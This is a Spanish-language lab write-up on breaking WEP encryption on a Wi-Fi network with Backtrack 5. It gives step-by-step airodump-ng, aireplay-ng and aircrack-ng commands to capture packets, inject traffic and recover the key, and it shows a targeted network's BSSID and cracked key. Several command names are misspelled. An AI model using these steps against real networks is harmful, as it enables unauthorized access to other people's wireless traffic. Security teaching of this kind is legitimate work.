Este documento describe cómo vulnerar la seguridad WEP en redes Wi-Fi utilizando Backtrack 5. Explica los pasos para escanear redes, capturar paquetes de una red específica, inyectar tráfico e identificar la clave WEP mediante el uso de herramientas como airodump-ng, aireplay-ng y aircrack-ng. La conclusión es que WEP no ofrece seguridad completa y que se deben implementar otras medidas para asegurar los datos transmitidos a través de redes inalámbricas.

1. SEGURIDAD EN WI-FI CON PROTOCOLOS WEP
OBJETIVO:
Desarrollar habilidades y conocimientos con respecto a la forma de vulnerar el
servicio de seguridad WEP en redes inalámbricas tipo Wi-Fi.
MATERIAL A UTILIZAR:
CD Backtrack 5 descargables de: http://www.backtrack-
linux.org/downloads/
Sistema operativo Linux.
TOPOLOGÍA A UTILIZAR:

2. PROCEDIMIENTOS PARA ACCEDER A UNA RED
Paso # 1: ingresar Backtrack5-ubuntu
Paso # 2: al ingresar al Backtrack5, nos pide login: root y password: toor
cuando arranque la interfaz ponemos la siguiente línea:
#aeromon-ng (este identifica que tarjeta de red se tiene en el equipo) después

3. #airodump-ng wlan0 (esta escanea las redes que hay alrededor, wlan0 tarjeta
de red de nuestro equipo).
#Iwconfig wlan0 (muestra los datos de la tarjeta).
# sudo ifconfig wlan0 down (este bajo los servicios de la tarjeta de red)
# sudo Iwconfig wlan0 mode monitor (ponerlo en modo monitor)
# sudo ifconfig wlan0 up (este nos sube los servicios del a tarjeta)
# sudo Iwconfig wlan0

4. Volvemos al paso a escribir airodump-ng wlan0 para escanear las
redes que hay al nuestro alrededor, en este paso escogemos la red
que vamos a craquear (como muestra la figura a continuación.)
Debemos tener en cuenta los números de:
BSSID
CANAL
ESSID - CLIENTE

5. #airondump-ng –w otro –c 1 –bssid 20:CF:30:37:9F:A8 wlan0
Estas especificaciones son la de la red que vamos a atacar, es
necesario escribir el bssid en mayúscula.
Otro (nombre de la carpeta donde va capturando los archivos)
-c (canal de la red).
BSSID CANAL ESSID
20:CF:30:37:9F:A8 CH 1 45159902
NOTA: en este paso esperamos a que mínimo tenga 30.OOO
paquetes, debajo del DATA.

6. Ahora abrimos otra consola:
#aireplay-ng -1 0 –a 20:CF:30:37:9F:A8 wlan0
(Trabajamos mientras van cargando los archivos)

7. Abrimos otra consola
# aireplay-ng -3 -b 20:CF:30:37:9F:A8 wlan0
(Este inyecta el tráfico. Este paso no funciona bien en todos los dispositivos
wifi, dependiendo de los drivers y núcleo de nuestro equipo. Esto nos permitirá
acelerar notablemente el proceso de captura de paquetes).

8. NOTA: las claves salen en hexadecimal y ASCII
En esta misma consola escribimos
#dir otro.cap (este es el archivo de nosotros con extensión .cap)
nos saldrá la siguiente pagina.
#aircrack-ng otro.cap key found (esta es la clave del
enrutamiento)

9. CLAVE: BEBDFF5052B42
Esta es la clave: BEBDFF5052B42 es la de la red que atacamos
45159902, a continuación comprobamos que si es la clave correcta.

11. CONCLUSION
Con en el laboratorio hemos concluido que la seguridad en las redes inalámbricas es
imprescindible siempre tener la en cuenta, ya que hay muchas transmisiones que no
son seguras, es casi que obligatorio asegúralas para la confiabilidad de los datos
como la integridad y autenticidad de estos mismos. Apresar que WEP está incluido en
la norma de la IEEE no proporciona seguridad total. Uno de los problemas más
latentes en la utilización de vectores al iniciarlo, ya que no tiene cifrado de mensajes
(clave secreta).
El protocolo WEP no debe ser la única herramienta o política para asegura datos o
contraseñas se debe de implementar otras alternativas y mantener controles para la
confiabilidad e integridad de datos y demás.